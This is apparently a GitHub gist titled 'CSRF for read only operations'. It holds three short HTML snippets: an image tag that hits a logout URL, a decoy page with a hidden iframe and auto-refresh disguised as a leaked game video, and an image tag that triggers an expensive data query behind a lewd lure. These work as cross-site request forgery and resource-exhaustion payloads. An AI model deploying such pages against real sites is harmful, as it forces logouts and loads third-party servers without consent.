Last active
August 29, 2015 14:17
-
-
Save PiotrPodsiadly/e99e443b46ecade392d7 to your computer and use it in GitHub Desktop.
CSRF for read only operations
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img src="http://my-app.com/logout"/> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <meta http-equiv="refresh" content="30"> | |
| </head> | |
| <body> | |
| <iframe src="http://popular-internet-speed-test.com/measure" class="hidden"/> | |
| <h1>Please wait while we load Half-Life 3 leaked video!</h1> | |
| Loading ... <img src="spinning-circle.gif"/> | |
| </body> | |
| </html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img src="http://stock-data-online.com/?show-all"/> | |
| <h1>Refresh 10 times to view my GF nudes!</h1> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment